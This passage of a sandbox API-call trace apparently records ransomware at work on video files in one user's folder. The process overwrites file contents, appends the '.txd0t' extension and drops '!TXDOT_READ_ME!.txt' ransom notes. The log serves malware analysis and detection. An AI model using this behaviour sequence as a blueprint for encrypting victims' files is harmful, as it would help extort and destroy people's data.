WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.956] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff4251, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.956] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xbba0, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0xbba0, lpOverlapped=0x0) returned 1 [0076.957] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff4460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.957] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xbba0, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0xbba0, lpOverlapped=0x0) returned 1 [0076.957] FlushFileBuffers (hFile=0x474) returned 1 [0076.960] GetProcessHeap () returned 0xe30000 [0076.960] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12e) returned 0xe9b648 [0076.961] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" [0076.961] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv") returned="IWWrfzZp12CtwW5GR.mkv" [0076.961] StrCpyW (in: psz1=0xe9b6a4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.961] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.961] GetProcessHeap () returned 0xe30000 [0076.961] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.961] CloseHandle (hObject=0x474) returned 1 [0076.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\iwwrfzzp12ctww5gr.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\iwwrfzzp12ctww5gr.mkv.txd0t")) returned 1 [0076.963] SetEvent (hEvent=0x3f8) returned 1 [0076.963] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.964] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" [0076.964] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t" [0076.964] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned 0 [0076.964] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4", dwFileAttributes=0x80) returned 1 [0076.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\lisqrmwmwfkmev9a6dun.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.964] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=62259) returned 1 [0076.964] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.965] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.965] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff0acd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.965] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf330, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0xf330, lpOverlapped=0x0) returned 1 [0076.967] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff0cd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.967] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf330, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0xf330, lpOverlapped=0x0) returned 1 [0076.967] FlushFileBuffers (hFile=0x474) returned 1 [0076.969] GetProcessHeap () returned 0xe30000 [0076.969] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x134) returned 0xe9b648 [0076.969] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" [0076.969] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4") returned="LISQrmwmwFkmeV9a6dun.mp4" [0076.969] StrCpyW (in: psz1=0xe9b6a4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.969] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.969] GetProcessHeap () returned 0xe30000 [0076.969] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.970] CloseHandle (hObject=0x474) returned 1 [0076.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\lisqrmwmwfkmev9a6dun.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\lisqrmwmwfkmev9a6dun.mp4.txd0t")) returned 1 [0076.972] SetEvent (hEvent=0x3f8) returned 1 [0076.972] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.973] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" [0076.973] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t" [0076.973] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t") returned 0 [0076.973] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv", dwFileAttributes=0x80) returned 1 [0076.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\mtvti3u5u.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.974] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=52195) returned 1 [0076.974] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.974] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.975] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff321d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.975] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xcbe0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0xcbe0, lpOverlapped=0x0) returned 1 [0076.976] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff3420, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.976] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xcbe0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0xcbe0, lpOverlapped=0x0) returned 1 [0076.977] FlushFileBuffers (hFile=0x474) returned 1 [0076.978] GetProcessHeap () returned 0xe30000 [0076.978] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0076.978] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" [0076.978] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv") returned="MTVtI3u5U.mkv" [0076.979] StrCpyW (in: psz1=0xe9b6a4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.979] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.979] GetProcessHeap () returned 0xe30000 [0076.979] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.979] CloseHandle (hObject=0x474) returned 1 [0076.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\mtvti3u5u.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\mtvti3u5u.mkv.txd0t")) returned 1 [0076.981] SetEvent (hEvent=0x3f8) returned 1 [0076.981] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.982] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" [0076.982] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t" [0076.982] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t") returned 0 [0076.982] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv", dwFileAttributes=0x80) returned 1 [0076.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\mzx-jxkkh.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0076.982] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=13760) returned 1 [0076.982] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.983] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.983] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffc840, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.983] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x35c0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x35c0, lpOverlapped=0x0) returned 1 [0076.984] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffca40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.984] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x35c0, lpOverlapped=0x0) returned 1 [0076.984] FlushFileBuffers (hFile=0x474) returned 1 [0076.986] GetProcessHeap () returned 0xe30000 [0076.986] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0076.986] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" [0076.986] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv") returned="mZX-jxKKh.mkv" [0076.986] StrCpyW (in: psz1=0xe9b6a4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.986] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned 1 [0076.986] GetProcessHeap () returned 0xe30000 [0076.986] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.986] CloseHandle (hObject=0x474) returned 1 [0076.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\mzx-jxkkh.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\mzx-jxkkh.mkv.txd0t")) returned 1 [0076.988] SetEvent (hEvent=0x3f8) returned 1 [0076.988] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.990] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" [0076.990] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t" [0076.990] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t") returned 0 [0076.990] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf", dwFileAttributes=0x80) returned 1 [0076.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\aunane-wugopdm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.991] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=73581) returned 1 [0076.991] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.991] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.992] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffede93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.992] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11f60, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x11f60, lpOverlapped=0x0) returned 1 [0076.993] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee0a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.993] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11f60, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x11f60, lpOverlapped=0x0) returned 1 [0076.994] FlushFileBuffers (hFile=0x460) returned 1 [0076.996] GetProcessHeap () returned 0xe30000 [0076.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x142) returned 0xed87a8 [0076.996] StrCpyW (in: psz1=0xed87a8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" [0076.996] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf") returned="AuNane-wUgoPDM.swf" [0076.996] StrCpyW (in: psz1=0xed881e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.996] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt") returned 0 [0076.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0076.997] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff444*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x37ff444*, lpNumberOfBytesWritten=0x37ff440*=0x2, lpOverlapped=0x0) returned 1 [0076.998] FlushFileBuffers (hFile=0x47c) returned 1 [0077.000] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff440*=0x7f0, lpOverlapped=0x0) returned 1 [0077.001] FlushFileBuffers (hFile=0x47c) returned 1 [0077.002] CloseHandle (hObject=0x47c) returned 1 [0077.003] GetProcessHeap () returned 0xe30000 [0077.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed87a8 | out: hHeap=0xe30000) returned 1 [0077.003] CloseHandle (hObject=0x460) returned 1 [0077.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\aunane-wugopdm.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\z2p1jcw7g9pu\\aunane-wugopdm.swf.txd0t")) returned 1 [0077.005] SetEvent (hEvent=0x3f8) returned 1 [0077.005] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0077.006] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" [0077.006] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t" [0077.006] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t") returned 0 [0077.006] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv", dwFileAttributes=0x80) returned 1 [0077.007] 